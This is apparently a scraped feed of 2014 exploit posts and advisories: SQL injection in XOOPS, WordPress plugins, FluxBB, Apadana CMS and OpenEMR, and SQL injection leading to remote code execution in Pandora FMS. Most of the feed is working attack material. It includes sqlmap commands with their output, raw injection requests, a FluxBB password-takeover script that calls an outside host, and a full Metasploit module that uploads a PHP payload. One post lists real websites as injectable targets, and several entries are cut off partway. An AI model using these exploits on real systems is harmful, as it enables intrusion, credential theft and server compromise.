SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet
bulkCopyHandler, TdsParserStateObject stateObj, Boolean&
dataReady)
at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
at System.Data.SqlClient.SqlDataReader.Read()
at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
--- End of inner exception stack trace ---</faultstring>
<detail/>
</soap:Fault>
</soap:Body>
</soap:Envelope>
Solution Fix & Patch:
================
Apply the patch for v3.0
Security Risk:
==========
The risk of the vulnerabilities above estimated as critical.
Credits & Authors:
==============
Bilgi Güvenliði Akademisi
Disclaimer & Information:
===================
The
information provided in this advisory is provided as it is without any
warranty. BGA disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a
particular purpose. BGA or its suppliers are not liable in any case of
damage, including direct, indirect, incidental, consequential loss of
business profits or special damages.
Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA
|
(1)
↧
XOOPS 2.5.6 SQL Injection
============================================= MGC ALERT 2014-003 - Original release date: March 6, 2014 - Last revised: November 18, 2014 - Discovered by: Manuel Garcia Cardenas - Severity: 7,1/10 (CVSS Base Score) ============================================= I. VULNERABILITY ------------------------- Blind SQL Injection in XOOPS <= 2.5.6 II. BACKGROUND ------------------------- XOOPS is an acronym of "eXtensible Object Oriented Portal System". Though started as a portal system, it later developed into a web application framework. It aims to serve as a web framework for use by small, medium and large sites, through the installation of modules. III. DESCRIPTION ------------------------- It is possible to inject SQL code in the variable "selgroups" on the page "admin.php". This bug was found using the portal with authentication. To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. IV. PROOF OF CONCEPT ------------------------- The following URL's and parameters have been confirmed to all suffer from Blind SQL injection. /xoops/htdocs/modules/system/admin.php?fct=users&selgroups=1 Exploiting with SQLMap: python sqlmap.py -u " http://192.168.244.129/xoops/htdocs/modules/system/admin.php?fct=users&selgroups=1" --cookie="PHPSESSID=kjrjempn828cgrv6k8tjp4fs60;xoops_user=0" -p "selgroups" --technique=TB --dbs [INFO] POST parameter 'selgroups' is 'MySQL > 5.0.11 AND time-based blind (comment)' injectable [INFO] POST parameter 'selgroups' is 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 10.04 (Lucid Lynx) web application technology: PHP 5.3.2, Apache 2.2.14 back-end DBMS: MySQL 5 [INFO] fetching database names [INFO] fetching number of databases [INFO] resumed: 4 [INFO] resumed: information_schema [INFO] resumed: mysql [INFO] resumed: phpmyadmin [INFO] resumed: xoops available databases [4]: [*] information_schema [*] mysql [*] phpmyadmin [*] xoops V. BUSINESS IMPACT ------------------------- Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED ------------------------- XOOPS <= 2.5.6 VII. SOLUTION ------------------------- Update to version 2.5.7 VIII. REFERENCES ------------------------- http://xoops.org/ http://xoops.org/modules/news/article.php?storyid=6658 IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY ------------------------- January 21, 2014 1: Initial release XI. DISCLOSURE TIMELINE ------------------------- March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas March 5, 2014 2: Send to vendor June 17, 2014 3: New version that includes patched code http://xoops.org/modules/news/article.php?storyid=6658 November 18, 2014 4: Sent to lists XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ------------------------- Manuel Garcia Cardenas Pentester |
(3)
↧
WordPress SP Client Document Manager 2.4.1 SQL Injection
Vulnerability title: Multiple SQL Injection in SP Client Document Manager plugin
Plugin: SP Client Document Manager
Vendor: http://smartypantsplugins.com
Product: https://wordpress.org/plugins/sp-client-document-manager/
Affected version: version 2.4.1 and previous version
Fixed version: N/A
Google dork: inurl:wp-content/plugins/sp-client-document-manager
Reported by: Dang Quoc Thai - thai.q.dang (at) itas (dot) vn
Credits to ITAS Team - www.itas.vn
::DESCRITION::
Multiple SQL injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database. The following URL and parameter has been confirmed to suffer from SQL injection:
Link 1:
POST /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=email-vendor HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://target.org/wordpress/?page_id=16
Cookie: wordpress_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7Cc493b6c21a4a1916e2bc6076600939af5276b6feb09d06ecc043c37bd92a0748; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7C7995fe13b1bbe0761cb05258e4e13b20b27cc9cedf3bc337440672353309e8a3; bp-activity-oldestpage=1
Connection: keep-alive
Content-Length: 33
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
vendor_email[]=<SQL Injection>
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1516 -> 1530)
function email_vendor()
{
global $wpdb, $current_user;
if (count($_POST['vendor_email']) == 0) {
echo '<p style="color:red;font-weight:bold">' . __("Please select at least one file!", "sp-cdm") . '</p>';
} else {
$files = implode(",", $_POST['vendor_email']);
echo "SELECT * FROM " . $wpdb->prefix . "sp_cu WHERE id IN (" . $files . ")"."n";
$r = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu WHERE id IN (" . $files . ")", ARRAY_A);
Link 2: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection>
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1462 -> 1479)
function download_project()
{
global $wpdb, $current_user;
$user_ID = $_GET['id'];
$r = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu where pid = $user_ID order by date desc", ARRAY_A);
$r_project = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu_project where id = $user_ID ", ARRAY_A);
$return_file = "" . preg_replace('/[^wd_ -]/si', '', stripslashes($r_project[0]['name'])) . ".zip";
$zip = new Zip();
$dir = '' . SP_CDM_UPLOADS_DIR . '' . $r_project[0]['uid'] . '/';
$path = '' . SP_CDM_UPLOADS_DIR_URL . '' . $r_project[0]['uid'] . '/';
//@unlink($dir.$return_file);
for ($i = 0; $i < count($r); $i++) {
$zip->addFile(file_get_contents($dir . $r[$i]['file']), $r[$i]['file'], filectime($dir . $r[$i]['file']));
}
$zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
$zip->setZipFile($dir . $return_file);
header("Location: " . $path . $return_file . "");
}
Link 3: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection>
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1480 -> 1496)
function download_archive()
{
global $wpdb, $current_user;
$user_ID = $_GET['id'];
$dir = '' . SP_CDM_UPLOADS_DIR . '' . $user_ID . '/';
$path = '' . SP_CDM_UPLOADS_DIR_URL . '' . $user_ID . '/';
$return_file = "Account.zip";
$zip = new Zip();
$r = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu where uid = $user_ID order by date desc", ARRAY_A);
//@unlink($dir.$return_file);
for ($i = 0; $i < count($r); $i++) {
$zip->addFile(file_get_contents($dir . $r[$i]['file']), $r[$i]['file'], filectime($dir . $r[$i]['file']));
}
$zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
$zip->setZipFile($dir . $return_file);
header("Location: " . $path . $return_file . "");
}
Link 4: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection>
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1480 -> 1496)
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 368 -> 372)
function remove_cat()
{
global $wpdb, $current_user;
$wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu_project WHERE id = " . $_REQUEST['id'] . " ");
$wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu WHERE pid = " . $_REQUEST['id'] . " ");
}
::DISCLOSURE::
+ 10/30/2014: Notify to vendor - vendor does not response
+ 11/08/2014: Notify to vendor - Vendor blocks IPs from Vietnam
+ 11/05/2014: Notify to vendor - vendor does not response
+ 11/20/2014: Public information
::REFERENCE::
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
|
(0)
↧
↧
WordPress wpDataTables 1.5.3 SQL Injection
######################
# Exploit Title : WordPress wpDataTables 1.5.3 and below SQL Injection Vulnerability
# Exploit Author : Claudio Viviani
# Software Link : http://wpdatatables.com (Premium)
# Date : 2014-11-22
# Tested on : Windows 7 / Mozilla Firefox
Windows 7 / sqlmap (0.8-1)
Linux / Mozilla Firefox
Linux / sqlmap 1.0-dev-5b2ded0
######################
# Description
Wordpress wpDataTables 1.5.3 and below suffers from SQL injection vulnerability
"table_id" variable is not sanitized.
File: wpdatatables.php
------------------------
// AJAX-handlers
add_action( 'wp_ajax_get_wdtable', 'wdt_get_ajax_data' );
add_action( 'wp_ajax_nopriv_get_wdtable', 'wdt_get_ajax_data' );
/**
* Handler which returns the AJAX response
*/
function wdt_get_ajax_data(){
$id = $_GET['table_id']; <------------------- Not Sanitized!
$table_data = wdt_get_table_by_id( $id );
$column_data = wdt_get_columns_by_table_id( $id );
$column_headers = array();
$column_types = array();
$column_filtertypes = array();
$column_inputtypes = array();
foreach($column_data as $column){
$column_order[(int)$column->pos] = $column->orig_header;
if($column->display_header){
$column_headers[$column->orig_header] = $column->display_header;
}
if($column->column_type != 'autodetect'){
$column_types[$column->orig_header] = $column->column_type;
}else{
$column_types[$column->orig_header] = 'string';
}
$column_filtertypes[$column->orig_header] = $column->filter_type;
$column_inputtypes[$column->orig_header] = $column->input_type;
}
------------------------
(The vulnerable variable is located in others php files)
######################
# PoC
http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1 [Sqli]
# Sqlmap
sqlmap -u "http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1" -p table_id --dbms mysql
---
Parameter: table_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=get_wdtable&table_id=1 AND 9029=9029
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: action=get_wdtable&table_id=1 AND SLEEP(5)
---
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################
|
(2)
↧
FluxBB 1.5.6 SQL Injection
#!/usr/bin/env python
# Friday, November 21, 2014 - secthrowaway@safe-mail.net
# FluxBB <= 1.5.6 SQL Injection
# make sure that your IP is reachable
url = 'http://target.tld/forum/'
user = 'user' # dummy account
pwd = 'test'
import urllib, sys, smtpd, asyncore, re, sha
from email import message_from_string
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
bindip = '0.0.0.0'
def stage1(sql):
if len(sql) > 80:
sys.exit('SQL too long, max 80 chars')
print "1st stage: %s (%d chars)" % (sql, len(sql))
r = urlopen(Request('%sprofile.php?action=change_email&id=%s' % (url, uid), data="form_sent=1&req_new_email=%s&req_password=%s&new_email=Submit" % (urllib.quote(sql), pwd), headers={"Referer": "%sprofile.php" % url, "User-agent": ua, "Cookie": cookie})).read()
if 'An email has been sent to the specified address' not in r:
sys.exit('err')
def stage3(key):
print "3rd stage, using key: %s" % key
r = urlopen(Request('%sprofile.php?action=change_pass&id=%s&key=%s' % (url, uid, key), headers={"User-agent": ua})).read()
if 'Your password has been updated' in r:
print 'success'
else:
print 'err'
class stage2_smtp(smtpd.SMTPServer):
def process_message(self, peer, mailfrom, rcpttos, data):
print '2nd stage: got mail', peer, mailfrom, "to:", rcpttos
key = re.search("(https?://.*&key=([^s]+))", message_from_string(data).get_payload(decode=True), re.MULTILINE)
if key is not None:
raise asyncore.ExitNow(key.group(2))
return
def login():
print "logging in"
r = urlopen(Request('%slogin.php?action=in' % url, data="form_sent=1&req_username=%s&req_password=%s" % (user, pwd), headers={"User-agent": ua}))
try:
t = r.info()['set-cookie'].split(';')[0]
return (t.split('=')[1].split('%7C')[0], t)
except:
sys.exit('unable to login, check user/pass')
uid, cookie = login()
email_domain = urlopen(Request('http://tns.re/gen')).read()
print "using domain: %s" % email_domain
#this will change your password to your password
|
(1)
↧
Pandora FMS SQL Injection Remote Code Execution
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'Pandora FMS SQLi Remote Code Execution',
'Description' => %q{
This module attempts to exploit multiple issues in order to gain remote
code execution under Pandora FMS version <= 5.0 SP2. First, an attempt
to authenticate using default credentials is performed. If this method
fails, a SQL injection vulnerability is leveraged in order to extract
the "Auto Login" password hash. If this value is not set, the module
will then extract the administrator account's MD5 password hash.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Lincoln <Lincoln[at]corelan.be>', # Discovery, Original Proof of Concept
'Jason Kratzer <pyoor[at]corelan.be>' # Metasploit Module
],
'References' =>
[
['URL', 'http://pandorafms.com/downloads/whats_new_5-SP3.pdf'],
['URL', 'http://blog.pandorafms.org/?p=2041']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
['Pandora FMS version <= 5.0 SP2', {}]
],
'Privileged' => false,
'Payload' =>
{
'Space' => 50000,
'DisableNops' => true,
},
'DisclosureDate' => "Feb 1 2014",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']),
OptString.new('USER', [false, 'The username to authenticate with', 'admin']),
OptString.new('PASS', [false, 'The password to authenticate with', 'pandora']),
], self.class)
end
def uri
target_uri.path
end
def check
vprint_status("#{peer} - Trying to detect installed version")
version = nil
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php')
})
if res && res.code == 200 && res.body =~ /Pandora FMS - the Flexible Monitoring System/
if res.body =~ /<div id="ver_num">v(.*?)</div>/
version = $1
else
return Exploit::CheckCode::Detected
end
end
unless version.nil?
vprint_status("#{peer} - Pandora FMS #{version} found")
if Gem::Version.new(version) <= Gem::Version.new('5.0SP2')
return Exploit::CheckCode::Appears
end
end
Exploit::CheckCode::Safe
end
# Attempt to login with credentials (default admin:pandora)
def authenticate
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
'vars_get' => {
'login' => "1",
},
'vars_post' => {
'nick' => datastore['USER'],
'pass' => datastore['PASS'],
'Login' => 'Login',
}
})
return auth_succeeded?(res)
end
# Attempt to login with auto login and SQLi
def login_hash
clue = rand_text_alpha(8)
sql_clue = clue.each_byte.map { |b| b.to_s(16) }.join
# select value from tconfig where token = 'loginhash_pwd';
sqli = "1' AND (SELECT 2243 FROM(SELECT COUNT(*),CONCAT(0x#{sql_clue},(SELECT MID((IFNULL(CAST"
sqli << "(value AS CHAR),0x20)),1,50) FROM tconfig WHERE token = 0x6c6f67696e686173685f707764 "
sqli << "LIMIT 0,1),0x#{sql_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP "
sqli << "BY x)a) AND 'msf'='msf"
password = inject_sql(sqli, clue)
if password && password.length != 0
print_status("#{peer} - Extracted auto login password (#{password})")
else
print_error("#{peer} - No auto login password has been defined!")
return false
end
print_status("#{peer} - Attempting to authenticate using (admin:#{password})")
# Attempt to login using login hash password
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
'vars_get' => {
'loginhash' => 'auto',
},
'vars_post' => {
'loginhash_data' => Rex::Text.md5("admin#{password}"),
'loginhash_user' => 'admin',
}
})
return auth_succeeded?(res)
end
def auth_succeeded?(res)
if res && res.code == 200 && res.body.include?('Welcome to Pandora FMS')
print_status("#{peer} - Successfully authenticated!")
print_status("#{peer} - Attempting to retrieve session cookie")
@cookie = res.get_cookies
if @cookie.include?('PHPSESSID')
print_status("#{peer} - Successfully retrieved session cookie: #{@cookie}")
return true
else
print_error("#{peer} - Error retrieving cookie!")
end
else
print_error("#{peer} - Authentication failed!")
end
false
end
def extract
# Generate random string and convert to hex
clue = rand_text_alpha(8)
hex_clue = clue.each_byte.map { |b| b.to_s(16) }.join
# select password from tusuario where id_user = 0;
sqli = "test' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x#{hex_clue},(SELECT MID((IFNULL"
sqli << "(CAST(password AS CHAR),0x20)),1,50) FROM tusuario WHERE id_user = 0 LIMIT 0,1)"
sqli << ",0x#{hex_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY "
sqli << "x)a) AND 'msf'='msf"
password = inject_sql(sqli, clue)
if password && password.length != 0
print_good("#{peer} - Extracted admin password hash, unsalted md5 - [ #{password} ]")
else
print_error("#{peer} - Unable to extract password hash!")
return false
end
end
def inject_sql(sql, fence_post)
# Extract password hash from database
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'mobile', 'index.php'),
'vars_post' => {
'action' => 'login',
'user' => sql,
'password' => 'pass',
'input' => 'Login'
}
})
result = nil
if res && res.code == 200
match = res.body.match(/(?<=#{fence_post})(.*)(?=#{fence_post})/)
if match
result = match[1]
else
print_error("#{peer} - SQL injection failed")
end
end
result
end
def upload
# Extract hash and hash2 from response
res = send_request_cgi({
'method' => 'GET',
'cookie' => @cookie,
'uri' => normalize_uri(uri, 'index.php'),
'vars_get' => {
'sec' => 'gsetup',
'sec2' => 'godmode/setup/file_manager'
}
})
if res && res.code == 200 && res.body =~ /(?<=input type="submit" id="submit-go")(.*)(?=<input id="hidden-directory" name="directory" type="hidden")/
form = $1
# Extract hash
if form =~ /(?<=name="hash" type="hidden" value=")(.*?)(?=" />)/
hash = $1
else
print_error("#{peer} - Could not extract hash from response!")
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end
# Extract hash2
if form =~ /(?<=name="hash2" type="hidden" value=")(.*?)(?=" />)/
hash2 = $1
else
print_error("#{peer} - Could not extract hash2 from response!")
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end
# Extract real_directory
if form =~ /(?<=name="real_directory" type="hidden" value=")(.*?)(" />)/
real_directory = $1
else
print_error("#{peer} - Could not extract real_directory from response!")
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end
else
print_error("#{peer} - Could not identify upload form!")
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end
# Upload script
@payload_name = "#{rand_text_alpha(8)}.php"
post_data = Rex::MIME::Message.new
post_data.add_part("<?php #{payload.encoded} ?>", 'text/plain', nil, %Q^form-data; name="file"; filename="#{@payload_name}"^)
post_data.add_part('', nil, nil, 'form-data; name="unmask"')
post_data.add_part('Go', nil, nil, 'form-data; name="go"')
post_data.add_part(real_directory, nil, nil, 'form-data; name="real_directory"')
post_data.add_part('images', nil, nil, 'form-data; name="directory"')
post_data.add_part("#{hash}", nil, nil, 'form-data; name="hash"')
post_data.add_part("#{hash2}", nil, nil, 'form-data; name="hash2"')
post_data.add_part('1', nil, nil, 'form-data; name="upload_file_or_zip"')
print_status("#{peer} - Attempting to upload payload #{@payload_name}...")
res = send_request_cgi({
'method' => 'POST',
'cookie' => @cookie,
'uri' => normalize_uri(uri, 'index.php'),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s,
'vars_get' => {
'sec' => 'gsetup',
'sec2' => 'godmode/setup/file_manager'
}
})
if res && res.code == 200 && res.body.include?("Upload correct")
register_file_for_cleanup(@payload_name)
print_status("#{peer} - Successfully uploaded payload")
else
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end
end
def exploit
# First try to authenticate using default or user-supplied credentials
print_status("#{peer} - Attempting to authenticate using (#{datastore['USER']}:#{datastore['PASS']})")
auth = authenticate
unless auth
print_status("#{peer} - Attempting to extract auto login hash via SQLi")
auth = login_hash
end
unless auth
print_status("#{peer} - Attempting to extract admin password hash with SQLi")
extract
fail_with(Failure::NoAccess, "#{peer} - Unable to perform remote code execution!")
end
print_status("#{peer} - Uploading PHP payload...")
upload
print_status("#{peer} - Executing payload...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'images', @payload_name),
'cookie' => @cookie
}, 1)
end
end
|
(0)
↧
Apadana CMS SQL Injection
[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0] [0] [0] Exploit Title : Apadana CMS Sql Injection Vulnerability [0] Exploit Author : SeRaVo.BlackHat [0] Vendor Homepage : http://www.apadanacms.ir/ [0] Google Dork : powered by apadana CMS [0] Date: 2014/November/25 [0] Tested On : windows + linux | Mozila | Havij [0] Software Link : http://www.itsecteam.com/products/havij-advanced-sql-injection/ [0] [0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0] [0] [0] :::::::::::::::::::::::::::::::::::::::::::::::::::::::: [0] ::: Apadana CMS Sql Injection Vulnerability ::: [0] :::::::::::::::::::::::::::::::::::::::::::::::::::::::: [0] ::: Iranian Cyber ARmy ~ Iranian Black Hat ::: [0] :::::::::::::::::::::::::::::::::::::::::::::::::::::::: [0] [0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0] [0] [0] :::::::::::::::: [0] ::::: DEMO ::::: [0] :::::::::::::::: [0] [0] Location : http://Target.com/?a=posts&b=category&c=[SQL] [0] [0] [0] :::::::::::::::: [0] ::::: ERROR :::: [0] :::::::::::::::: [0] [0] http://wa-swimming.ir/?a=posts&b=category&c=20 [0] http://wa-swimming.ir/?a=posts&b=category&c=20%27 [0] [0] http://beh-boshrooyeh.ir/?a=posts&b=102 [0] http://beh-boshrooyeh.ir/?a=posts&b=102%27 [0] [0] [0] http://www.kandimizbahloolabad.ir/?a=posts&b=1 [0] http://www.kandimizbahloolabad.ir/?a=posts&b=1%27 [0] [0] [0] http://padika.ir/?a=posts&b=category&c=1 [0] http://padika.ir/?a=posts&b=category&c=1%27 [0] [0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0] [0] [0] Discovered by : SeRaVo.BlackHat [0] Hassan [0] [0] [0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0] [0] [0] General.BlackHat@Gmail.com . FB.com/general.blackhat [0] [0] MY FRIEND'Z : Unhex.coder + #N3T + Lupin 13 + AMOK + Milad.Hacking + Mr.Time [0] SHD.N3T + MR.M@j!D + eb051 + Dr.SQ1 + Dr.3vil + RAMIN + ACC3SS + X3UR + 4li.BlackHat [0] Net.editor + M3QDAD + M.R.S.CO + Hesam King + Evil Shadow + 3H34N + IraQeN-H4XORZ [0] And All Iranian Cyber Army .... [0] [0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0] |
(0)
↧
↧
OpenEMR 4.1.2(7) SQL Injection
----------1034262177
Content-Disposition: form-data; name="form_without"
on
----------1034262177
Content-Disposition: form-data; name="form_deposit_date"
5
----------1034262177
Content-Disposition: form-data; name="form_paydate"
5
----------1034262177
Content-Disposition: form-data; name="form_category"
All
----------1034262177
Content-Disposition: form-data; name="form_erafile"; filename="file.txt"
Content-Type: text/plain
boom
----------1034262177
Content-Disposition: form-data; name="MAX_FILE_SIZE"
5000000
----------1034262177
Content-Disposition: form-data; name="form_amount"
5
----------1034262177
Content-Disposition: form-data; name="form_encounter"
5
----------1034262177
Content-Disposition: form-data; name="form_to_date"
5
----------1034262177
Content-Disposition: form-data; name="form_payer_id"
2
----------1034262177
Content-Disposition: form-data; name="form_source"
5
----------1034262177
Content-Disposition: form-data; name="form_name"
BOOOM
----------1034262177
Content-Disposition: form-data; name="form_search"
Search
----------1034262177
Content-Disposition: form-data; name="form_date"
5-5-5
----------1034262177--
Request 6
GET /openemr/interface/logview/logview.php?end_date=2014-07-25&sortby=&csum=&event=&check_sum=on&start_date=2014-07-25&type_event=select&eventname=login HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en
Request 7
POST /openemr/interface/orders/procedure_stats.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
form_sexes=1&form_to_date=2014-07-25&form_by=5&form_submit=Submit&form_show%5b%5d=.age&form_output=2&form_facility=4&form_from_date=0000-00-
Request 8
POST /openemr/interface/orders/pending_followup.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0; pma_theme=original
form_to_date=2014-07-25&form_refresh=Refresh&form_facility=5&form_from_date=2014-07-25
Request 9
POST /openemr/interface/orders/pending_orders.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=3j8g58403l71iohk70l1oif3b5
form_to_date=2014-07-25&form_refresh=Refresh&form_facility=4&form_from_date=2014-07-25
Request 10
POST /openemr/interface/patient_file/deleter.php?patient=&encounterid=&formid=&issue=&document=&payment=&billing=&transaction= HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=kpqal2o1e4am9eh0lce5qt3ab0
form_submit=Yes%2c+Delete+and+Log
Request 11
POST /openemr/interface/patient_file/encounter/coding_popup.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154
Search+Results=&newcodes=&bn_search=Search&ProviderID=1&search_type=CPT4&search_term=5
Request 12
POST /openemr/interface/patient_file/encounter/search_code.php?type= HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: pma_lang=en; pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; OpenEMR=8oihner1200va2pr7oq1q67154
